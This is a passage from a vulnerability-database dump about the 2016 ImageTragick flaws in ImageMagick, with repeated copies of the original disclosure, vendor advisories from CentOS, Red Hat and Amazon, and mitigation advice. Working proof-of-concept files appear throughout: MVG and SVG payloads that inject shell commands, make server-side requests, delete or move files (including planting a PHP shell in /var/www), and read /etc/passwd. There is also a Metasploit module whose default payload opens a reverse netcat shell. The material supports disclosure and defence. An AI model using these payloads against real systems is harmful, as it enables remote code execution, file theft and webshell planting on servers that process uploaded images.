uses ImageMagick to process user supplied\r\nimages and uses default delegates.xml / policy.xml, may be vulnerable to\r\nthis issue.\r\n\r\nexploit.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(https://example.com/image.jpg\"|ls \"-la)'\r\npop graphic-context\r\n\r\nexploit.svg\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" standalone=\"no\"?>\r\n<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\"\r\n\"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\r\n<svg width=\"640px\" height=\"480px\" version=\"1.1\"\r\nxmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\r\n\"http://www.w3.org/1999/xlink\">\r\n<image xlink:href=\"https://example.com/image.jpg\"|ls \"-la\"\r\nx=\"0\" y=\"0\" height=\"640px\" width=\"480px\"/>\r\n</svg>\r\n\r\n$ convert exploit.mvg out.png\r\ntotal 32\r\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\r\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\r\n...\r\n\r\nImageMagick tries to guess the type of the file by it's content, so\r\nexploitation doesn't depend on the file extension. You can rename\r\nexploit.mvg to exploit.jpg or exploit.png to bypass file type checks. In\r\naddition, ImageMagick's tool 'identify' is also vulnerable, so it can't\r\nbe used as a protection to filter file by it's content and creates\r\nadditional attack vectors (e.g. via 'less exploit.jpg', because\r\n'identify' is invoked via lesspipe.sh).\r\nUbuntu 14.04 and OS X, latest system packages (ImageMagick 6.9.3-7 Q16\r\nx86_64 2016-04-27 and ImageMagick 6.8.6-10 2016-04-29 Q16) and latest\r\nsources from 6 and 7 branches all are vulnerable. Ghostscript and wget\r\n(or curl) should be installed on the system for successful PoC\r\nexecution. For svg PoC ImageMagick's svg parser should be used, not rsvg.\r\n\r\nAll other issues also rely on dangerous ImageMagick feature of external\r\nfiles inclusion from any supported protocol in formats like svg and mvg.\r\n\r\n2. CVE-2016-3718 - SSRF\r\nIt is possible to make HTTP GET or FTP request:\r\n\r\nssrf.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(http://example.com/)'\r\npop graphic-context\r\n\r\n$ convert ssrf.mvg out.png # makes http request to example.com\r\n\r\n3. CVE-2016-3715 - File deletion\r\nIt is possible to delete files by using ImageMagick's 'ephemeral' pseudo\r\nprotocol which deletes files after reading:\r\n\r\ndelete_file.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'ephemeral:/tmp/delete.txt'\r\npopgraphic-context\r\n\r\n$ touch /tmp/delete.txt\r\n$ convert delete_file.mvg out.png # deletes /tmp/delete.txt\r\n\r\n4. CVE-2016-3716 - File moving\r\nIt is possible to move image files to file with any extension in any\r\nfolder by using ImageMagick's 'msl' pseudo protocol. msl.txt and\r\nimage.gif should exist in known location - /tmp/ for PoC (in real life\r\nit may be web service written in PHP, which allows to upload raw txt\r\nfiles and process images with ImageMagick):\r\n\r\nfile_move.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'msl:/tmp/msl.txt'\r\npopgraphic-context\r\n\r\n/tmp/msl.txt\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<image>\r\n<read filename=\"/tmp/image.gif\" />\r\n<write filename=\"/var/www/shell.php\" />\r\n</image>\r\n\r\n/tmp/image.gif - image with php shell inside\r\n(https://www.secgeek.net/POC/POC.gif for example)\r\n\r\n$ convert file_move.mvg out.png # moves /tmp/image.gif to /var/www/shell.php\r\n\r\n5. CVE-2016-3717 - Local file read (independently reported by original\r\nresearch author - https://hackerone.com/stewie)\r\nIt is possible to get content of the files from the server by using\r\nImageMagick's 'label' pseudo protocol:\r\n\r\nfile_read.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'label:@...c/passwd'\r\npop graphic-context\r\n\r\n$ convert file_read.mvg out.png # produces file with text rendered from\r\n/etc/passwd\r\n\r\n\r\nHow to mitigate the vulnerability.\r\n\r\nAvailable patches appear to be incomplete.\r\nIf you use ImageMagick or an affected library, we recommend you mitigate\r\nthe known vulnerabilities by doing at least one these two things (but\r\npreferably both!):\r\n1. Verify that all image files begin with the expected \ufffdmagic bytes\ufffd\r\ncorresponding to the image file types you support before sending them to\r\nImageMagick for processing. (see FAQ for more info)\r\n2. Use a policy file to disable the vulnerable ImageMagick coders. The\r\nglobal policy for ImageMagick is usually found in \ufffd/etc/ImageMagick\ufffd.\r\nThis policy.xml example will disable the coders EPHEMERAL, URL, MVG, and\r\nMSL:\r\n\r\n<policymap>\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"URL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" />\r\n</policymap>\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\nApril, 21 2016 - file read vulnerability report for one of My.Com\r\nservices from https://hackerone.com/stewie received by Mail.Ru Security\r\nTeam. Issue is reportedly known to ImageMagic team.\r\nApril, 21 2016 - file read vulnerability patched by My.Com development team\r\nApril, 28 2016 - code execution vulnerability in ImageMagick was found\r\nby Nikolay Ermishkin from Mail.Ru Security Team while researching\r\noriginal report\r\nApril, 30 2016 - code execution vulnerability reported to ImageMagick\r\ndevelopment team\r\nApril, 30 2016 - code execution vulnerability fixed by ImageMagick\r\n(incomplete fix)\r\nApril, 30 2016 - fixed ImageMagic version 6.9.3-9 published (incomplete fix)\r\nMay, 1 2016 - ImageMagic informed of the fix bypass\r\nMay, 2 2016 - limited disclosure to 'distros' mailing list\r\nMay, 3 2016 - public disclosure at https://imagetragick.com/\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39767/"}, {"lastseen": "2016-05-09T21:15:09", "description": "ImageMagick Delegate Arbitrary Command Execution. CVE-2016-3714. Local exploits for multiple platform", "published": "2016-05-09T00:00:00", "type": "exploitdb", "title": "ImageMagick Delegate Arbitrary Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3714"], "modified": "2016-05-09T00:00:00", "id": "EDB-ID:39791", "href": "https://www.exploit-db.com/exploits/39791/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::FILEFORMAT\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ImageMagick Delegate Arbitrary Command Execution',\r\n 'Description' => %q{\r\n This module exploits a shell command injection in the way \"delegates\"\r\n (commands for converting files) are processed in ImageMagick versions\r\n <= 7.0.1-0 and <= 6.9.3-9 (legacy).\r\n\r\n Since ImageMagick uses file magic to detect file format, you can create\r\n a .png (for example) which is actually a crafted SVG (for example) that\r\n triggers the command injection.\r\n\r\n Tested on Linux, BSD, and OS X. You'll want to choose your payload\r\n carefully due to portability concerns. Use cmd/unix/generic if need be.\r\n },\r\n 'Author' => [\r\n 'stewie', # Vulnerability discovery\r\n 'Nikolay Ermishkin', # Vulnerability discovery\r\n 'wvu', # Metasploit module\r\n 'hdm' # Metasploit module\r\n ],\r\n 'References' => [\r\n %w{CVE 2016-3714},\r\n %w{URL https://imagetragick.com/},\r\n %w{URL http://seclists.org/oss-sec/2016/q2/205},\r\n %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},\r\n %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}\r\n ],\r\n 'DisclosureDate' => 'May 3 2016',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Privileged' => false,\r\n 'Payload' => {\r\n 'BadChars' => \"\\x22\\x27\\x5c\", # \", ', and \\\r\n 'Compat' => {\r\n 'PayloadType' => 'cmd cmd_bash',\r\n 'RequiredCmd' => 'generic netcat bash-tcp'\r\n }\r\n },\r\n 'Targets' => [\r\n ['SVG file', template: 'msf.svg'], # convert msf.png msf.svg\r\n ['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg\r\n ['MIFF file', template: 'msf.miff'] # convert -label \"\" msf.svg msf.miff\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'cmd/unix/reverse_netcat',\r\n 'LHOST' => Rex::Socket.source_address,\r\n 'DisablePayloadHandler' => false,\r\n 'WfsDelay' => 9001\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('FILENAME', [true, 'Output file', 'msf.png'])\r\n ])\r\n end\r\n\r\n def exploit\r\n if target.name == 'SVG file'\r\n p = Rex::Text.html_encode(payload.encoded)\r\n else\r\n p = payload.encoded\r\n end\r\n\r\n file_create(template.sub('echo vulnerable', p))\r\n end\r\n\r\n def template\r\n File.read(File.join(\r\n Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]\r\n ))\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/39791/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:20", "description": "\nImageMagick 7.0.1-0 6.9.3-9 - ImageTragick Multiple Vulnerabilities", "edition": 1, "published": "2016-05-04T00:00:00", "title": "ImageMagick 7.0.1-0 6.9.3-9 - ImageTragick Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-04T00:00:00", "id": "EXPLOITPACK:E547A33BCC88CE840B8FDF179CDA0103", "href": "", "sourceData": "Nikolay Ermishkin from the Mail.Ru Security Team discovered several\nvulnerabilities in ImageMagick.\nWe've reported these issues to developers of ImageMagick and they made a\nfix for RCE in sources and released new version (6.9.3-9 released\n2016-04-30 http://legacy.imagemagick.org/script/changelog.php), but this\nfix seems to be incomplete. We are still working with developers.\n\nImageMagick: Multiple vulnerabilities in image decoder\n\n1. CVE-2016-3714 - Insufficient shell characters filtering leads to\n(potentially remote) code execution\n\nInsufficient filtering for filename passed to delegate's command allows\nremote code execution during conversion of several file formats.\n\nImageMagick allows to process files with external libraries. This\nfeature is called 'delegate'. It is implemented as a system() with\ncommand string ('command') from the config file delegates.xml with\nactual value for different params (input/output filenames etc). Due to\ninsufficient %M param filtering it is possible to conduct shell command\ninjection. One of the default delegate's command is used to handle https\nrequests:\n\"wget\" -q -O \"%o\" \"https:%M\"\nwhere %M is the actual link from the input. It is possible to pass the\nvalue like `https://example.com\"|ls \"-la` and execute unexpected 'ls\n-la'. (wget or curl should be installed)\n\n$ convert 'https://example.com\"|ls \"-la' out.png\ntotal 32\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\n...\n\n\nThe most dangerous part is ImageMagick supports several formats like\nsvg, mvg (thanks to https://hackerone.com/stewie for his research of\nthis file format and idea of the local file read vulnerability in\nImageMagick, see below), maybe some others - which allow to include\nexternal files from any supported protocol including delegates. As a\nresult, any service, which uses ImageMagick to process user supplied\nimages and uses default delegates.xml / policy.xml, may be vulnerable to\nthis issue.\n\nexploit.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nfill 'url(https://example.com/image.jpg\"|ls \"-la)'\npop graphic-context\n\nexploit.svg\n-=-=-=-=-=-=-=-=-\n<?xml version=\"1.0\" standalone=\"no\"?>\n<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\"\n\"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n<svg width=\"640px\" height=\"480px\" version=\"1.1\"\nxmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\n\"http://www.w3.org/1999/xlink\">\n<image xlink:href=\"https://example.com/image.jpg\"|ls \"-la\"\nx=\"0\" y=\"0\" height=\"640px\" width=\"480px\"/>\n</svg>\n\n$ convert exploit.mvg out.png\ntotal 32\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\n...\n\nImageMagick tries to guess the type of the file by it's content, so\nexploitation doesn't depend on the file extension. You can rename\nexploit.mvg to exploit.jpg or exploit.png to bypass file type checks. In\naddition, ImageMagick's tool 'identify' is also vulnerable, so it can't\nbe used as a protection to filter file by it's content and creates\nadditional attack vectors (e.g. via 'less exploit.jpg', because\n'identify' is invoked via lesspipe.sh).\nUbuntu 14.04 and OS X, latest system packages (ImageMagick 6.9.3-7 Q16\nx86_64 2016-04-27 and ImageMagick 6.8.6-10 2016-04-29 Q16) and latest\nsources from 6 and 7 branches all are vulnerable. Ghostscript and wget\n(or curl) should be installed on the system for successful PoC\nexecution. For svg PoC ImageMagick's svg parser should be used, not rsvg.\n\nAll other issues also rely on dangerous ImageMagick feature of external\nfiles inclusion from any supported protocol in formats like svg and mvg.\n\n2. CVE-2016-3718 - SSRF\nIt is possible to make HTTP GET or FTP request:\n\nssrf.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nfill 'url(http://example.com/)'\npop graphic-context\n\n$ convert ssrf.mvg out.png # makes http request to example.com\n\n3. CVE-2016-3715 - File deletion\nIt is possible to delete files by using ImageMagick's 'ephemeral' pseudo\nprotocol which deletes files after reading:\n\ndelete_file.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 'ephemeral:/tmp/delete.txt'\npopgraphic-context\n\n$ touch /tmp/delete.txt\n$ convert delete_file.mvg out.png # deletes /tmp/delete.txt\n\n4. CVE-2016-3716 - File moving\nIt is possible to move image files to file with any extension in any\nfolder by using ImageMagick's 'msl' pseudo protocol. msl.txt and\nimage.gif should exist in known location - /tmp/ for PoC (in real life\nit may be web service written in PHP, which allows to upload raw txt\nfiles and process images with ImageMagick):\n\nfile_move.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 'msl:/tmp/msl.txt'\npopgraphic-context\n\n/tmp/msl.txt\n-=-=-=-=-=-=-=-=-\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<image>\n<read filename=\"/tmp/image.gif\" />\n<write filename=\"/var/www/shell.php\" />\n</image>\n\n/tmp/image.gif - image with php shell inside\n(https://www.secgeek.net/POC/POC.gif for example)\n\n$ convert file_move.mvg out.png # moves /tmp/image.gif to /var/www/shell.php\n\n5. CVE-2016-3717 - Local file read (independently reported by original\nresearch author - https://hackerone.com/stewie)\nIt is possible to get content of the files from the server by using\nImageMagick's 'label' pseudo protocol:\n\nfile_read.mvg\n-=-=-=-=-=-=-=-=-\npush graphic-context\nviewbox 0 0 640 480\nimage over 0,0 0,0 'label:@...c/passwd'\npop graphic-context\n\n$ convert file_read.mvg out.png # produces file with text rendered from\n/etc/passwd\n\n\nHow to mitigate the vulnerability.\n\nAvailable patches appear to be incomplete.\nIf you use ImageMagick or an affected library, we recommend you mitigate\nthe known vulnerabilities by doing at least one these two things (but\npreferably both!):\n1. Verify that all image files begin with the expected \ufffdmagic bytes\ufffd\ncorresponding to the image file types you support before sending them to\nImageMagick for processing. (see FAQ for more info)\n2. Use a policy file to disable the vulnerable ImageMagick coders. The\nglobal policy for ImageMagick is usually found in \ufffd/etc/ImageMagick\ufffd.\nThis policy.xml example will disable the coders EPHEMERAL, URL, MVG, and\nMSL:\n\n<policymap>\n <policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"URL\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" />\n <policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" />\n</policymap>\n\n\nVulnerability Disclosure Timeline:\nApril, 21 2016 - file read vulnerability report for one of My.Com\nservices from https://hackerone.com/stewie received by Mail.Ru Security\nTeam. Issue is reportedly known to ImageMagic team.\nApril, 21 2016 - file read vulnerability patched by My.Com development team\nApril, 28 2016 - code execution vulnerability in ImageMagick was found\nby Nikolay Ermishkin from Mail.Ru Security Team while researching\noriginal report\nApril, 30 2016 - code execution vulnerability reported to ImageMagick\ndevelopment team\nApril, 30 2016 - code execution vulnerability fixed by ImageMagick\n(incomplete fix)\nApril, 30 2016 - fixed ImageMagic version 6.9.3-9 published (incomplete fix)\nMay, 1 2016 - ImageMagic informed of the fix bypass\nMay, 2 2016 - limited disclosure to 'distros' mailing list\nMay, 3 2016 - public disclosure at https://imagetragick.com/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:28:35", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0726\n\n\nImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats.\n\nSecurity Fix(es):\n\n* It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application. (CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-May/033903.html\nhttp://lists.centos.org/pipermail/centos-announce/2016-May/033904.html\n\n**Affected packages:**\nImageMagick\nImageMagick-c++\nImageMagick-c++-devel\nImageMagick-devel\nImageMagick-doc\nImageMagick-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0726.html", "edition": 3, "modified": "2016-05-09T17:55:46", "published": "2016-05-09T17:51:59", "href": "http://lists.centos.org/pipermail/centos-announce/2016-May/033903.html", "id": "CESA-2016:0726", "title": "ImageMagick security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:25", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "description": "ImageMagick is an image display and manipulation tool for the X Window System that can read and write multiple image formats.\n\nSecurity Fix(es):\n\n* It was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application. (CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to delete, move, or disclose the contents of arbitrary files. (CVE-2016-3715, CVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.", "modified": "2018-06-06T20:24:27", "published": "2016-05-09T20:56:15", "id": "RHSA-2016:0726", "href": "https://access.redhat.com/errata/RHSA-2016:0726", "type": "redhat", "title": "(RHSA-2016:0726) Important: ImageMagick security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "**Issue Overview:**\n\nIt was discovered that ImageMagick did not properly sanitize certain input before passing it to the delegate functionality. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would lead to arbitrary execution of shell commands with the privileges of the user running the application. ([CVE-2016-3714 __](<https://access.redhat.com/security/cve/CVE-2016-3714>))\n\nIt was discovered that certain ImageMagick coders and pseudo-protocols did not properly prevent security sensitive operations when processing specially crafted images. A remote attacker could create a specially crafted image that, when processed by an application using ImageMagick or an unsuspecting user using the ImageMagick utilities, would allow the attacker to disclose the contents of arbitrary files. ([CVE-2016-3715 __](<https://access.redhat.com/security/cve/CVE-2016-3715>), [CVE-2016-3716 __](<https://access.redhat.com/security/cve/CVE-2016-3716>), [CVE-2016-3717 __](<https://access.redhat.com/security/cve/CVE-2016-3717>))\n\nA server-side request forgery flaw was discovered in the way ImageMagick processed certain images. A remote attacker could exploit this flaw to mislead an application using ImageMagick or an unsuspecting user using the ImageMagick utilities into, for example, performing HTTP(S) requests or opening FTP sessions via specially crafted images. ([CVE-2016-3718 __](<https://access.redhat.com/security/cve/CVE-2016-3718>))\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file that disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT, and LABEL coders. If you experience any problems after the update, it may be necessary to manually adjust the policy.xml file to match your requirements. Please take additional precautions to ensure that your applications using the ImageMagick library do not process malicious or untrusted files before doing so.\n\n \n**Affected Packages:** \n\n\nImageMagick\n\n \n**Issue Correction:** \nRun _yum update ImageMagick_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n ImageMagick-doc-6.7.8.9-13.19.amzn1.i686 \n ImageMagick-perl-6.7.8.9-13.19.amzn1.i686 \n ImageMagick-c++-6.7.8.9-13.19.amzn1.i686 \n ImageMagick-6.7.8.9-13.19.amzn1.i686 \n ImageMagick-debuginfo-6.7.8.9-13.19.amzn1.i686 \n ImageMagick-devel-6.7.8.9-13.19.amzn1.i686 \n ImageMagick-c++-devel-6.7.8.9-13.19.amzn1.i686 \n \n src: \n ImageMagick-6.7.8.9-13.19.amzn1.src \n \n x86_64: \n ImageMagick-debuginfo-6.7.8.9-13.19.amzn1.x86_64 \n ImageMagick-6.7.8.9-13.19.amzn1.x86_64 \n ImageMagick-c++-6.7.8.9-13.19.amzn1.x86_64 \n ImageMagick-devel-6.7.8.9-13.19.amzn1.x86_64 \n ImageMagick-c++-devel-6.7.8.9-13.19.amzn1.x86_64 \n ImageMagick-doc-6.7.8.9-13.19.amzn1.x86_64 \n ImageMagick-perl-6.7.8.9-13.19.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2016-05-11T11:00:00", "published": "2016-05-11T11:00:00", "id": "ALAS-2016-699", "href": "https://alas.aws.amazon.com/ALAS-2016-699.html", "title": "Important: ImageMagick", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-03T00:14:07", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-05-04T00:00:00", "type": "zdt", "title": "ImageMagick 6.9.3-9 / 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-04T00:00:00", "href": "https://0day.today/exploit/description/25991", "id": "1337DAY-ID-25991", "sourceData": "Nikolay Ermishkin from the Mail.Ru Security Team discovered several\r\nvulnerabilities in ImageMagick.\r\nWe've reported these issues to developers of ImageMagick and they made a\r\nfix for RCE in sources and released new version (6.9.3-9 released\r\n2016-04-30 http://legacy.imagemagick.org/script/changelog.php), but this\r\nfix seems to be incomplete. We are still working with developers.\r\n \r\nImageMagick: Multiple vulnerabilities in image decoder\r\n \r\n1. CVE-2016-3714 - Insufficient shell characters filtering leads to\r\n(potentially remote) code execution\r\n \r\nInsufficient filtering for filename passed to delegate's command allows\r\nremote code execution during conversion of several file formats.\r\n \r\nImageMagick allows to process files with external libraries. This\r\nfeature is called 'delegate'. It is implemented as a system() with\r\ncommand string ('command') from the config file delegates.xml with\r\nactual value for different params (input/output filenames etc). Due to\r\ninsufficient %M param filtering it is possible to conduct shell command\r\ninjection. One of the default delegate's command is used to handle https\r\nrequests:\r\n\"wget\" -q -O \"%o\" \"https:%M\"\r\nwhere %M is the actual link from the input. It is possible to pass the\r\nvalue like `https://example.com\"|ls \"-la` and execute unexpected 'ls\r\n-la'. (wget or curl should be installed)\r\n \r\n$ convert 'https://example.com\"|ls \"-la' out.png\r\ntotal 32\r\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\r\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\r\n...\r\n \r\n \r\nThe most dangerous part is ImageMagick supports several formats like\r\nsvg, mvg (thanks to https://hackerone.com/stewie for his research of\r\nthis file format and idea of the local file read vulnerability in\r\nImageMagick, see below), maybe some others - which allow to include\r\nexternal files from any supported protocol including delegates. As a\r\nresult, any service, which uses ImageMagick to process user supplied\r\nimages and uses default delegates.xml / policy.xml, may be vulnerable to\r\nthis issue.\r\n \r\nexploit.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(https://example.com/image.jpg\"|ls \"-la)'\r\npop graphic-context\r\n \r\nexploit.svg\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" standalone=\"no\"?>\r\n<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\"\r\n\"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\r\n<svg width=\"640px\" height=\"480px\" version=\"1.1\"\r\nxmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\r\n\"http://www.w3.org/1999/xlink\">\r\n<image xlink:href=\"https://example.com/image.jpg\"|ls \"-la\"\r\nx=\"0\" y=\"0\" height=\"640px\" width=\"480px\"/>\r\n</svg>\r\n \r\n$ convert exploit.mvg out.png\r\ntotal 32\r\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\r\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\r\n...\r\n \r\nImageMagick tries to guess the type of the file by it's content, so\r\nexploitation doesn't depend on the file extension. You can rename\r\nexploit.mvg to exploit.jpg or exploit.png to bypass file type checks. In\r\naddition, ImageMagick's tool 'identify' is also vulnerable, so it can't\r\nbe used as a protection to filter file by it's content and creates\r\nadditional attack vectors (e.g. via 'less exploit.jpg', because\r\n'identify' is invoked via lesspipe.sh).\r\nUbuntu 14.04 and OS X, latest system packages (ImageMagick 6.9.3-7 Q16\r\nx86_64 2016-04-27 and ImageMagick 6.8.6-10 2016-04-29 Q16) and latest\r\nsources from 6 and 7 branches all are vulnerable. Ghostscript and wget\r\n(or curl) should be installed on the system for successful PoC\r\nexecution. For svg PoC ImageMagick's svg parser should be used, not rsvg.\r\n \r\nAll other issues also rely on dangerous ImageMagick feature of external\r\nfiles inclusion from any supported protocol in formats like svg and mvg.\r\n \r\n2. CVE-2016-3718 - SSRF\r\nIt is possible to make HTTP GET or FTP request:\r\n \r\nssrf.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(http://example.com/)'\r\npop graphic-context\r\n \r\n$ convert ssrf.mvg out.png # makes http request to example.com\r\n \r\n3. CVE-2016-3715 - File deletion\r\nIt is possible to delete files by using ImageMagick's 'ephemeral' pseudo\r\nprotocol which deletes files after reading:\r\n \r\ndelete_file.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'ephemeral:/tmp/delete.txt'\r\npopgraphic-context\r\n \r\n$ touch /tmp/delete.txt\r\n$ convert delete_file.mvg out.png # deletes /tmp/delete.txt\r\n \r\n4. CVE-2016-3716 - File moving\r\nIt is possible to move image files to file with any extension in any\r\nfolder by using ImageMagick's 'msl' pseudo protocol. msl.txt and\r\nimage.gif should exist in known 